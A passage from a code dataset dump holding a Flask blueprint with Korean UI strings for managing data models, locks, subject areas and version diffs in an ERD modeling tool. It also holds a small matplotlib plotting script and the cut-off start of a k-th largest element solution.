'E:/dummy/'","sub_path":"Wind/Config/PathsExP50.py","file_name":"PathsExP50.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"473320330","text":"from . 
import bpapp\r\nfrom datetime import datetime, timedelta\r\nfrom ercc.models import (\r\n Model,\r\n Entity,\r\n Project,\r\n # GlossaryBase,\r\n ProjectUser,\r\n # ModelHistory,\r\n SubjectArea,\r\n SubjectTree,\r\n)\r\nfrom ercc.ercc_bps.model_mgmt.forms import (\r\n DbmsTypeSettingForm,\r\n ModelBasicForm,\r\n)\r\nfrom flask_login import current_user\r\nfrom flask import request, render_template, jsonify, abort, redirect, url_for, g\r\nfrom flask_breadcrumbs import register_breadcrumb, default_breadcrumb_root\r\nfrom collections import namedtuple\r\nfrom flask_babel import lazy_gettext\r\nfrom ercc.ercc_bps.erc.ercDataModel import ercDataModel\r\n# from ercc.ercc_bps.schema.models import SchemaCollector\r\nfrom bson.json_util import dumps\r\nfrom bson.objectid import ObjectId\r\nfrom ercc.utils.portlet import Portlet\r\nfrom ercc.utils import (\r\n flash_success,\r\n flash_error,\r\n flash_warning,\r\n # flash_info,\r\n)\r\n\r\n# import difflib\r\n\r\n\r\ndefault_breadcrumb_root(bpapp, '.')\r\n\r\n\r\n@bpapp.route('/p//m_pref', methods=['GET'])\r\n@bpapp.route('/p//m_pref/', methods=['GET'])\r\n@register_breadcrumb(bpapp, '.model_mgmt', lazy_gettext(u'모델 관리'))\r\ndef model_mgmt(project_id, tab=None):\r\n # project = Project.objects.get_or_404(id=project_id)\r\n # return render_template('model_mgmt/model_mgmt.html', project=project, tab=tab)\r\n return render_template(\r\n 'project/portlets.htm.j2',\r\n active_page='model_mgmt',\r\n portlets=[\r\n Portlet('model_mgmt._model_property', project_id=project_id)\r\n ],\r\n )\r\n\r\n\r\n@bpapp.route('/p//m_prefp', methods=['GET', 'POST'])\r\ndef _model_property(project_id):\r\n # from ercc.models import SubjectTree\r\n project = Project.objects.get_or_404(id=project_id)\r\n project_user = ProjectUser.objects(project=project, user=current_user._get_current_object()).get_or_404()\r\n # stree = SubjectTree.head_objects(prjId=str(project.id)).first()\r\n\r\n # if stree:\r\n # models_in_stree = [ObjectId(d['Oid']) for d in stree.modelOrder]\r\n # else:\r\n # models_in_stree = []\r\n\r\n if not (project_user.is_modeler or project_user.is_owner):\r\n abort(400)\r\n\r\n if request.method == 'POST':\r\n form = DbmsTypeSettingForm(request.form, project_id=project_id)\r\n if form.validate():\r\n model = form.model.data\r\n model.dbmsType = form.dbms_type.data\r\n if 'notation' in model and model.notation == 'universalc' and \\\r\n form.erd_notation_type.data != 'universalc':\r\n return jsonify(result='fail',\r\n message=lazy_gettext(u'Universal-C표기법은 설정 이후 변경이 불가능합니다.'))\r\n else:\r\n model.notation = form.erd_notation_type.data\r\n\r\n if project.project_group.use_glossary_master:\r\n glossary_master = project.project_group.glossary_master\r\n glossary_derived = project.queryset_glossary(glossary_master=glossary_master).first()\r\n if not form.glossary.data or form.glossary.data != glossary_derived:\r\n return jsonify(\r\n result='fail',\r\n message=lazy_gettext('반드시 전사용어사전을 사용해야 합니다.'))\r\n\r\n if form.glossary.data:\r\n model.glossaryId = form.glossary.data.id\r\n else:\r\n model.glossaryId = None\r\n if form.schema_collector.data:\r\n model.schema_collector_id = form.schema_collector.data.id\r\n else:\r\n model.schema_collector_id = None\r\n model.save()\r\n\r\n from ercc.signals import on_created_model\r\n on_created_model.send(model)\r\n\r\n return jsonify(result='ok')\r\n return jsonify(result='fail', message=form.errors)\r\n\r\n models = Model.head_objects.filter(prjId=project_id).order_by('name')\r\n Formdata = 
namedtuple(\"DbmsTypeSettingForm\",\r\n \"model dbms_type erd_notation_type glossary schema_collector\")\r\n forms = []\r\n for model in models:\r\n if project_user.can_manage_all_models or model.root_object in project_user.manageable_models:\r\n pass\r\n else:\r\n continue\r\n\r\n temporary_form = Formdata(\r\n model=model,\r\n dbms_type=getattr(model, 'dbmsType', ''), # 'oracle'),\r\n erd_notation_type=getattr(model, 'notation', 'ie'),\r\n glossary=model.glossary,\r\n schema_collector=model.schema_collector,\r\n )\r\n form = DbmsTypeSettingForm(obj=temporary_form, project_id=project_id)\r\n forms.append(form)\r\n return render_template(\r\n 'model_mgmt/_model_property.html',\r\n project_user=project_user,\r\n project=project,\r\n forms=forms)\r\n\r\n\r\n@bpapp.route('/m//_tools', methods=['GET', 'POST'])\r\ndef _model_tools(model_id):\r\n model = Model.objects.get_or_404(id=model_id)\r\n # subjects = [\r\n # SubjectArea.objects(id=subject['id']).first()\r\n # for subject in model.subjectareas\r\n # ]\r\n # subjects = [\r\n # subject.head_object\r\n # for subject in subjects\r\n # if subject\r\n # ]\r\n if request.method == 'POST':\r\n form = ModelBasicForm(request.form)\r\n # form.populate_obj(model)\r\n model.name = form.name.data\r\n model.subjectareaTree = model.reorg_subjecttree()\r\n model.save()\r\n\r\n if form.change_owner_all.data:\r\n updated_cnt = g.model.reset_all_entities_dbowner(form.change_owner_name.data)\r\n flash_success(f'{updated_cnt}건의 엔터티 dbowner정보가 변경되었습니다.')\r\n\r\n flash_success('성공적으로 저장되었습니다!')\r\n else:\r\n form = ModelBasicForm(obj=model)\r\n\r\n return render_template(\r\n 'model_mgmt/_model_tools.htm.j2',\r\n model=model,\r\n form=form)\r\n\r\n\r\n@bpapp.route('/m//_lock', methods=['GET'])\r\ndef _model_lock(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n result = ercDataModel.get_lock(model.prjId, current_user.id, None,\r\n 'Model', model.id, None)\r\n if result:\r\n flash_success('locked success!')\r\n else:\r\n flash_warning('locked failed!')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_unlock', methods=['GET'])\r\ndef _model_unlock(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n result = ercDataModel.release_lock(model.prjId, current_user.id,\r\n 'Model', model.id, None)\r\n if result['result'] == 'Y':\r\n flash_success('unlocked success!')\r\n else:\r\n flash_warning('unlocked failed!')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_clean', methods=['GET'])\r\ndef _model_clean(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n en_list = model.clean_orphan_entities()\r\n if en_list:\r\n ercDataModel.release_lock(model.prjId, current_user.id,\r\n 'Model', model_id, None)\r\n flash_success('고아앤터티 정리 성공하였습니다.')\r\n else:\r\n flash_warning('정리할 앤터티가 없습니다.')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_clean_relations', methods=['GET'])\r\ndef _model_relations_clean(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n relations = model.clean_orphan_relations()\r\n if relations:\r\n ercDataModel.release_lock(model.prjId, current_user.id,\r\n 'Model', model_id, None)\r\n flash_success('미사용관계를 정리하였습니다.')\r\n else:\r\n flash_warning('정리할 관계가 없습니다.')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n 
return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_reorg_subjectareaTree', methods=['GET'])\r\ndef _model_reorg_subjectareaTree(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n model.fix_old_subjectareas(commit=True)\r\n flash_success('주제영역트리를 재정리하였습니다.')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_set_to_skipped_attr', methods=['GET'])\r\ndef _model_set_to_skipped_attr(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n model.set_to_skipped_attr()\r\n flash_success('모델의 비표준속성들을 예외처리하였습니다.')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_archive', methods=['GET'])\r\ndef _model_archive(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n if model.update(newest='D') > 0:\r\n # delete to subjecttree\r\n # st = SubjectTree.head_objects.get_or_404(prjId=model.prjId)\r\n # st.modelOrder.remove(dict(id=str(model.id), Oid=str(model.Oid)))\r\n # st.save()\r\n\r\n ercDataModel.release_lock(model.prjId, current_user.id,\r\n 'Model', model_id, None)\r\n flash_success('archived success!')\r\n else:\r\n flash_warning('archived failed!')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_subject_delete/', methods=['POST', 'GET'])\r\ndef _subject_delete(model_id, subject_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n subject = SubjectArea.head_objects.get_or_404(id=subject_id)\r\n if subject:\r\n subject.update(newest='D')\r\n model.subjectareas.remove({'id': str(subject.id), 'Oid': str(subject.Oid)})\r\n model.reorg_subjecttree()\r\n model.save_upgrade_version()\r\n ercDataModel.release_lock(model.prjId, current_user.id,\r\n 'Model', model_id, None)\r\n model = Model.newest_model(model_id)\r\n flash_success('주제영역이 삭제되었습니다.')\r\n else:\r\n flash_error('주제영역을 찾을 수 없습니다.')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_subject_clone', methods=['POST', 'GET'])\r\n@bpapp.route('/m//_subject_clone/', methods=['POST', 'GET'])\r\ndef _subject_clone(model_id, subject_id=None):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n if subject_id:\r\n subject = SubjectArea.objects.get_or_404(id=subject_id)\r\n else:\r\n clone_to = request.form.get('clone_to')\r\n if clone_to:\r\n subject = SubjectArea.objects.get_or_404(id=clone_to)\r\n else:\r\n subject = None\r\n if subject:\r\n subject.clone(to=model)\r\n if subject.id != subject_id:\r\n ercDataModel.release_lock(model.prjId, current_user.id,\r\n 'Model', model_id, None)\r\n model = model.head_object\r\n flash_success('clone success!')\r\n else:\r\n flash_warning('clone failed!')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/p//_new_model', methods=['GET'])\r\ndef _model_create(project_id):\r\n sa = SubjectArea(\r\n name='__new_erd__',\r\n prjId=str(project_id),\r\n zoomLevel=20,\r\n width=1500,\r\n height=1500,\r\n entities=[],\r\n relations=[],\r\n version=1,\r\n # 
modified=datetime.now(),\r\n # modifiedBy=current_user.id,\r\n # created=datetime.now(),\r\n # createdBy=current_user.id,\r\n newest='Y').save()\r\n sa.update(Oid=sa.id)\r\n sa.reload()\r\n model_name = '__new_model__'\r\n model = Model(\r\n name=model_name,\r\n prjId=str(project_id),\r\n newest='Y',\r\n version=1,\r\n # modified=datetime.now(),\r\n # modifiedBy=current_user.id,\r\n # created=datetime.now(),\r\n # createdBy=current_user.id,\r\n subjectareas=[dict(id=sa.id, Oid=sa.Oid)],\r\n relations=[],\r\n entities=[],\r\n )\r\n if g.project.project_group.use_glossary_master:\r\n gm = g.project.project_group.glossary_master\r\n gd = g.project.queryset_glossary(glossary_master=gm).first()\r\n if gd:\r\n model.glossaryId = gd.id\r\n model.save()\r\n model.update(Oid=model.id)\r\n model.reload()\r\n # model.subjectareaTree = model.reorg_subjecttree()\r\n # model.save()\r\n # model.reload()\r\n\r\n from ercc.signals import on_created_model\r\n on_created_model.send(model)\r\n\r\n # add to subjecttree\r\n st = SubjectTree.head_objects.get_or_404(prjId=project_id)\r\n print('ssss', st.id)\r\n st.modelOrder.append(dict(id=str(model.id), Oid=str(model.Oid)))\r\n st.save()\r\n\r\n flash_success('새로운 데이터 모델이 생성되었습니다.')\r\n return redirect(url_for('._model_property', project_id=project_id))\r\n\r\n\r\n@bpapp.route('/m//_model_clone', methods=['GET'])\r\ndef _model_clone(model_id):\r\n model = Model.objects.get_or_404(id=model_id)\r\n model.clone()\r\n\r\n # add to subjecttree\r\n st = SubjectTree.head_objects.get_or_404(prjId=model.prjId)\r\n st.modelOrder.append(dict(id=str(model.id), Oid=str(model.Oid)))\r\n st.save()\r\n\r\n if model.id != model_id:\r\n flash_success('모델 복제가 성공적으로 수행되었습니다!')\r\n else:\r\n flash_warning('죄송합니다. 모델 복제가 실패했습니다.')\r\n return redirect(url_for('model_mgmt._model_property', project_id=model.prjId))\r\n\r\n\r\n@bpapp.route('/m//_history', methods=['GET'])\r\ndef _model_history(model_id):\r\n\r\n diff_a_id = request.args.get('diff_a')\r\n diff_b_id = request.args.get('diff_b')\r\n added = None\r\n deleted = None\r\n changed = None\r\n if diff_a_id and diff_b_id:\r\n diff_a = Model.objects(id=diff_a_id).first()\r\n diff_b = Model.objects(id=diff_b_id).first()\r\n if diff_a and diff_b:\r\n if diff_a.version < diff_b.version:\r\n diff_a, diff_b = diff_b, diff_a\r\n # diff = difflib.HtmlDiff()\r\n # diff_table = diff.make_table(\r\n # sorted([f'{e.entNm}' for e in diff_b.queryset_entity]),\r\n # sorted([f'{e.entNm}' for e in diff_a.queryset_entity]),\r\n # fromdesc=f'version-{diff_b.version}',\r\n # todesc=f'version-{diff_a.version}',\r\n # context=True,\r\n # numlines=0,\r\n # )\r\n diff_a_entities = list(diff_a.queryset_entity.all())\r\n diff_b_entities = list(diff_b.queryset_entity.all())\r\n\r\n # oid로 비교해야 added/deleted를 판단할 수 있다.\r\n added = [\r\n e\r\n for e in diff_b_entities if e.Oid in (\r\n set(e.Oid for e in diff_b_entities) - set(e.Oid for e in diff_a_entities)\r\n )\r\n ]\r\n deleted = [\r\n e\r\n for e in diff_a_entities if e.Oid in (\r\n set(e.Oid for e in diff_a_entities) - set(e.Oid for e in diff_b_entities)\r\n )\r\n ]\r\n\r\n # oid는 같은데 id가 다른 것은 changed\r\n same = set(e.Oid for e in diff_a_entities) & set(e.Oid for e in diff_b_entities)\r\n diff_a_entities = {e.Oid: e for e in diff_a_entities if e.Oid in same}\r\n diff_b_entities = {e.Oid: e for e in diff_b_entities if e.Oid in same}\r\n\r\n # 교집합에서 Oid는 같은데 id가 다른 것만 추출\r\n changed = [\r\n (diff_b_entities[oid], diff_a_entities[oid])\r\n for oid in same\r\n if diff_a_entities[oid].id != 
diff_b_entities[oid].id\r\n ]\r\n else:\r\n diff_a, diff_b = None, None\r\n\r\n return render_template(\r\n 'model_mgmt/_model_history.htm.j2',\r\n model=g.model,\r\n diff=(added, deleted, changed),\r\n diff_a=diff_a,\r\n diff_b=diff_b,\r\n project=g.model.project,\r\n )\r\n\r\n\r\n@bpapp.route('/m//_detail', methods=['GET'])\r\ndef _model_detail(model_id):\r\n\r\n model = Model.objects.get_or_404(id=model_id)\r\n model_props = [k for k in dir(model) if not k.startswith('_')]\r\n return render_template(\r\n 'model_mgmt/_model_detail.htm.j2',\r\n model=model, model_props=model_props)\r\n\r\n\r\n@bpapp.route('/m//_details', methods=['GET'])\r\ndef _model_details(model_id):\r\n\r\n # model = Model.objects.only('Oid').get_or_404(id=model_id).head_object\r\n model = Model.objects.get_or_404(id=model_id)\r\n Formdata = namedtuple(\"timeline\",\r\n \"id oid name last_modified\")\r\n form = Formdata(\r\n id=model.id,\r\n oid=model.Oid,\r\n name=model.name,\r\n last_modified=model.modified\r\n )\r\n return render_template(\r\n 'model_mgmt/_model_details.htm.j2', form=form, project_id=model.prjId, model=model)\r\n\r\n\r\n@bpapp.route('/m//_export', methods=['GET'])\r\ndef _model_export(model_id):\r\n\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n return render_template(\r\n 'model_mgmt/_model_export.htm.j2', model=model)\r\n\r\n\r\n@bpapp.route('/m//_delete', methods=['GET'])\r\ndef _model_delete(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n model.delete()\r\n\r\n flash_success('모델이 성공적으로 삭제되었습니다.')\r\n return redirect(url_for('model_mgmt._model_property', project_id=model.project.id))\r\n\r\n\r\n@bpapp.route('/p//m_prefvl', methods=['GET', 'POST'])\r\ndef _model_version_lock(project_id):\r\n\r\n project = Project.objects.get_or_404(id=project_id)\r\n project_user = ProjectUser.objects(project=project, user=current_user._get_current_object()).get_or_404()\r\n\r\n models = Model.head_objects.filter(prjId=project_id).order_by('name')\r\n Formdata = namedtuple(\"timeline\",\r\n \"id oid name last_modified\")\r\n forms = []\r\n for model in models:\r\n if project_user.can_manage_all_models or model.root_object in project_user.manageable_models:\r\n pass\r\n else:\r\n continue\r\n\r\n temporary_form = Formdata(\r\n id=model.id,\r\n oid=model.Oid,\r\n name=model.name,\r\n last_modified=model.modified\r\n )\r\n forms.append(temporary_form)\r\n\r\n project = Project.objects.get_or_404(id=project_id)\r\n\r\n from ercc.ercc_bps.api.v1.btstptbl import ProjectModelHistoryResource\r\n history_resource = ProjectModelHistoryResource()\r\n\r\n yesterday = datetime.today() - timedelta(1)\r\n history = history_resource.get_history_list(project_id=project_id, date_from=yesterday)\r\n\r\n yesterday_model_map = {}\r\n\r\n for model in history:\r\n entity_count = 0\r\n for dtl in model[\"dtl\"]:\r\n if \"object_type\" in dtl and dtl[\"object_type\"] == \"entity\":\r\n entity_count += 1\r\n previous_count = yesterday_model_map[model[\"model_name\"]][\"modified_entities_count\"] \\\r\n if model[\"model_name\"] in yesterday_model_map else 0\r\n\r\n yesterday_model_map[model[\"model_name\"]] = \\\r\n {\"name\": model[\"model_name\"], \"modified_entities_count\": previous_count + entity_count}\r\n\r\n yesterday_models = [\r\n v for k, v in yesterday_model_map.items()\r\n ]\r\n\r\n return render_template('model_mgmt/_model_timeline.html',\r\n project=project, forms=forms, yesterday_models=yesterday_models)\r\n\r\n\r\n@bpapp.route('/getModelTimeline/', methods=['POST', 'GET'])\r\ndef 
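_model_history above classifies entities by comparing Oid sets between two versions and flags an entity as changed when the same Oid maps to a different document id. The same three-way split, distilled into a standalone helper with explicit old/new naming (the function name is hypothetical):

def diff_by_oid(old_entities, new_entities):
    old = {e.Oid: e for e in old_entities}
    new = {e.Oid: e for e in new_entities}
    added = [e for oid, e in new.items() if oid not in old]
    deleted = [e for oid, e in old.items() if oid not in new]
    # The same Oid surviving in both versions but pointing at a different
    # document id means the entity was edited between the two versions.
    changed = [(old[oid], new[oid])
               for oid in old.keys() & new.keys()
               if old[oid].id != new[oid].id]
    return added, deleted, changed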
get_model_timeline(project_id):\r\n prjId = str(request.json['project_id'])\r\n mdlOId = str(request.json['model_oid'])\r\n userId = current_user.to_dbref().id\r\n\r\n timeline = ercDataModel.get_model_timeline(prjId, mdlOId, userId)\r\n lock = ercDataModel.get_model_timeline_lock(prjId, mdlOId, userId)\r\n result = {\r\n \"timeline\": timeline,\r\n \"lock\": lock\r\n }\r\n return dumps(result, ensure_ascii=False)\r\n\r\n\r\n@bpapp.route('/getModelTimelineDetail/', methods=['POST', 'GET'])\r\ndef get_model_timeline_detail(project_id):\r\n prjId = str(request.json['project_id'])\r\n mdlOId = str(request.json['model_oid'])\r\n # userId = current_user.to_dbref().id\r\n\r\n models = Model.objects.filter(prjId=prjId, Oid=ObjectId(mdlOId)).order_by('modified').limit(200)\r\n return render_template('model_mgmt/_model_timeline_detail.html', models=models)\r\n\r\n\r\n@bpapp.route('/timelineRemoveLock/', methods=['POST', 'GET'])\r\ndef timeline_remove_lock(project_id):\r\n prjId = str(request.json['project_id'])\r\n mdlOId = str(request.json['mdlOId'])\r\n lockType = str(request.json['lockType'])\r\n # userId = current_user.to_dbref().id\r\n lockUserId = str(request.json['userId'])\r\n\r\n result = ercDataModel.release_lock(prjId, lockUserId, lockType, mdlOId, \"\")\r\n return dumps(result, ensure_ascii=False)\r\n\r\n\r\n@bpapp.route('/e/')\r\n@bpapp.route('/e//view')\r\ndef entity_viewer(entity_id):\r\n return render_template(\r\n 'project/portlets.htm.j2',\r\n active_page='report',\r\n portlets=[\r\n Portlet('model_mgmt._entity_viewer', entity_id=entity_id),\r\n # Portlet('erc._entities', model_id=g.entity.model.id)\r\n ]\r\n )\r\n\r\n\r\n@bpapp.route('/m/')\r\n@bpapp.route('/m//view')\r\ndef model_viewer(model_id):\r\n return render_template(\r\n 'project/portlets.htm.j2',\r\n active_page='model_mgmt',\r\n portlets=[\r\n # Portlet('model_mgmt._model_tools', model_id=model_id),\r\n Portlet('model_mgmt._entities', model_id=model_id)\r\n ]\r\n )\r\n\r\n\r\n@bpapp.route('/s/')\r\n@bpapp.route('/s//view')\r\ndef subjectarea_viewer(subjectarea_id):\r\n return render_template(\r\n 'project/portlets.htm.j2',\r\n active_page='model_mgmt',\r\n portlets=[\r\n # Portlet('model_mgmt._model_tools', model_id=model_id),\r\n Portlet('model_mgmt._entities', subjectarea_id=subjectarea_id)\r\n ]\r\n )\r\n\r\n\r\n@bpapp.route('/s//_view')\r\ndef _subjectarea_viewer(subjectarea_id):\r\n return redirect(url_for('model_mgmt._entities', subjectarea_id=subjectarea_id))\r\n\r\n\r\n@bpapp.route('/m//_view')\r\ndef _model_viewer(model_id):\r\n return redirect(url_for('model_mgmt._entities', model_id=model_id))\r\n # return render_template(\r\n # 'project/portlets.htm.j2',\r\n # active_page='report',\r\n # portlets=[\r\n # # Portlet('model_mgmt._model_tools', model_id=model_id),\r\n # Portlet('erc._entities', model_id=model_id)\r\n # ]\r\n # )\r\n\r\n\r\n@bpapp.route('/e//_view')\r\n@bpapp.route('/e//_view///')\r\ndef _entity_viewer(entity_id, action='default', table_typ='L'):\r\n \"\"\"\r\n 엔티티 속성에 대한 검토랑 수행\r\n \"\"\"\r\n entity = g.entity\r\n if action == 'glossary_test':\r\n entity.glossary_integrity_check(rewrite=True)\r\n elif action == 'glossary_run':\r\n entity.glossary_integrity_change()\r\n elif action == 'glossary_run_exception':\r\n entity.set_to_glossary_skipped()\r\n entity.save()\r\n elif action == 'schema_test':\r\n entity.schema_integrity_check(rewrite=True)\r\n entity.inspect_qa()\r\n elif action == 'schema_run':\r\n entity.schema_integrity_check(commit=False)\r\n entity.schema_integrity_change(\r\n 
rewrite=True, # 기존검사결과 덮어씌우기\r\n recreate=False # merge, 스키마기준으로 새로 생성하지 않음\r\n )\r\n entity.inspect_qa()\r\n\r\n if table_typ == 'L':\r\n entity.attrs.sort(key=lambda x: int(x['Lattr']['Order']))\r\n else:\r\n entity.attrs.sort(key=lambda x: int(x['Pattr']['Physical_Order']))\r\n\r\n return render_template(\r\n 'model_mgmt/entity_viewer.htm.j2',\r\n project_group=g.project_group,\r\n entity=entity,\r\n table_typ=table_typ,\r\n action=action)\r\n\r\n\r\n@bpapp.route('/e//_history')\r\ndef _entity_history(entity_id, type='json'):\r\n\r\n # history는 항상 최신 기준으로\r\n entity = g.entity.head_object\r\n\r\n # def _format(obj, indent=1):\r\n # if isinstance(obj, list):\r\n # htmls = []\r\n # for k in obj:\r\n # htmls.append(_format(k, indent + 1))\r\n # return '[
%s]' % (indent, ','.join(htmls))\r\n # if isinstance(obj, dict):\r\n # htmls = []\r\n # for k, v in obj.items():\r\n # htmls.append(\"%s: %s\" % (k, _format(v, indent + 1)))\r\n # return '{%s}' % (indent, ','
'.join(htmls))\r\n # return str(obj)\r\n\r\n # 교집합에서 id는 같은데 내용이 다른 것만 추출\r\n def _attr2singleline(attr):\r\n attrnm = attr.get(\"Lattr\", {}).get('attrNm', '')\r\n order = attr.get(\"Lattr\", {}).get('Order', '')\r\n pk = '(pk) ' if attr.get(\"Lattr\", {}).get('PKYN', '') else ''\r\n colnm = attr.get(\"Pattr\", {}).get('colNm', '')\r\n porder = attr.get(\"Pattr\", {}).get('Physical_Order', '')\r\n null = '' if attr.get(\"Lattr\", {}).get('nullYN', '') else 'NOTNULL'\r\n dataTyp = attr.get(\"Pattr\", {}).get('dataTyp', '')\r\n defaultVal = attr.get(\"Pattr\", {}).get('defaultVal', '')\r\n return f'{pk}{attrnm} {colnm} {dataTyp} {defaultVal} {null} -- order:{order}, physical_order:{porder}'\r\n\r\n diff_a_id = request.args.get('diff_a')\r\n diff_b_id = request.args.get('diff_b')\r\n added = None\r\n deleted = None\r\n changed = None\r\n if diff_a_id and diff_b_id:\r\n diff_a = Entity.objects(id=diff_a_id).first()\r\n diff_b = Entity.objects(id=diff_b_id).first()\r\n if diff_a and diff_b:\r\n if diff_a.version < diff_b.version:\r\n diff_a, diff_b = diff_b, diff_a\r\n # diff = difflib.HtmlDiff()\r\n # diff_table = diff.make_table(\r\n # sorted([f'{e.entNm}' for e in diff_b.queryset_entity]),\r\n # sorted([f'{e.entNm}' for e in diff_a.queryset_entity]),\r\n # fromdesc=f'version-{diff_b.version}',\r\n # todesc=f'version-{diff_a.version}',\r\n # context=True,\r\n # numlines=0,\r\n # )\r\n\r\n # unwrap from mongoengine-dict\r\n diff_a_attrs = list(dict(d) for d in diff_a.attrs)\r\n diff_b_attrs = list(dict(d) for d in diff_b.attrs)\r\n\r\n # id로 비교해야 added/deleted를 판단할 수 있다.\r\n added = [\r\n _attr2singleline(a)\r\n for a in diff_b_attrs if a.get('id') in (\r\n set(a.get('id') for a in diff_b_attrs if a.get('id')) - set(a.get('id') for a in diff_a_attrs if a.get('id'))\r\n )\r\n ]\r\n deleted = [\r\n _attr2singleline(a)\r\n for a in diff_a_attrs if a.get('id') in (\r\n set(a.get('id') for a in diff_a_attrs if a.get('id')) - set(a.get('id') for a in diff_b_attrs if a.get('id'))\r\n )\r\n ]\r\n\r\n # id는 같은데 id가 다른 것은 changed\r\n same = set(a.get('id') for a in diff_a_attrs if a.get('id')) & set(a.get('id') for a in diff_b_attrs if a.get('id'))\r\n diff_a_attrs = {a.get('id'): a for a in diff_a_attrs if a.get('id') in same}\r\n diff_b_attrs = {a.get('id'): a for a in diff_b_attrs if a.get('id') in same}\r\n\r\n changed = [\r\n (_attr2singleline(diff_b_attrs[aid]), _attr2singleline(diff_a_attrs[aid]))\r\n for aid in same\r\n if _attr2singleline(diff_b_attrs[aid]) != _attr2singleline(diff_a_attrs[aid])\r\n # if (\r\n # diff_a_attrs[aid].get('Lattr') != diff_b_attrs[aid].get('Lattr') or\r\n # diff_a_attrs[aid].get('Pattr') != diff_b_attrs[aid].get('Pattr')\r\n # ) # 내용비교를 이렇게만?\r\n ]\r\n else:\r\n diff_a, diff_b = None, None\r\n return render_template(\r\n 'model_mgmt/entity_history.htm.j2',\r\n diff=(added, deleted, changed),\r\n diff_a=diff_a,\r\n diff_b=diff_b,\r\n entity=entity,\r\n model=entity.model)\r\n\r\n\r\n@bpapp.route('/m//_entities')\r\n@bpapp.route('/s//_entities')\r\ndef _entities(model_id=None, subjectarea_id=None):\r\n if subjectarea_id:\r\n return render_template(\r\n 'model_mgmt/entities.htm.j2',\r\n obj=g.subjectarea,\r\n obj_type='subjectarea',\r\n model_id=model_id,\r\n subjectarea_id=subjectarea_id,\r\n )\r\n else:\r\n return render_template(\r\n 'model_mgmt/entities.htm.j2',\r\n obj=g.model,\r\n obj_type='model',\r\n model_id=model_id,\r\n subjectarea_id=subjectarea_id,\r\n )\r\n\r\n\r\n@bpapp.route('/m//_delete_entities', methods=['DELETE', 
])\r\n@bpapp.route('/s//_delete_entities', methods=['DELETE', ])\r\ndef _delete_entities(model_id=None, subjectarea_id=None):\r\n from bson import ObjectId\r\n\r\n if model_id is None:\r\n model = g.subjectarea.model\r\n else:\r\n model = g.model\r\n\r\n # entity\r\n entity_ids = request.json.get('ids', [])\r\n deleted = Entity.head_objects(id__in=[ObjectId(oid) for oid in entity_ids]).update(newest='D')\r\n\r\n # model\r\n for eid in entity_ids:\r\n model.entities.remove(eid)\r\n model.save()\r\n\r\n # subjectarea\r\n for sja in model.queryset_subjectarea.only('entities'):\r\n sja.entities = [\r\n e\r\n for e in sja.entities\r\n if e['id'] not in entity_ids\r\n ]\r\n sja.save()\r\n\r\n return jsonify(deleted=deleted)\r\n","sub_path":"ercc/ercc_bps/model_mgmt/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":31246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"383801977","text":"import matplotlib.pyplot as plt\nfrom scipy import *\nimport numpy as np\t\n\nd = loadtxt(\"dn\")\nd2 = loadtxt(\"dn_U0.5\")\nU = 0.5\nplt.plot(d[:,0],abs(np.array(d[:,1])+1j*np.array(d[:,2])),'-o')\nplt.plot(d2[:,0],abs(np.array(d2[:,1])+1j*np.array(d2[:,2])),'-o')\nplt.ylim(0,1.2)\nplt.savefig(\"nt_Uf%s.eps\"%U,format=\"eps\")\nplt.show()\n","sub_path":"HM_interaction_quench/interaction_quench/Uf_0.5/dn_plot.py","file_name":"dn_plot.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"500470550","text":"\"\"\"\nFind K-th largest element in an array.\nNote\n\nYou can swap elements in the array\nExample\n\nIn array [9,3,2,4,8], the 3th largest element is 4\nChallenge\n\nO(n) time, O(1) space\n\"\"\"\n__author__ = 'Danyang'\n\n\nclass Solution:\n def kthLargestElement(self, k, A):\n \"\"\"\n partial quick sort\n\n :param k: int\n :param A: lst\n :return: int\n \"\"\"\n k = len(A)-k\n return self.find_kth(A, 0, len(A), k)\n\n def 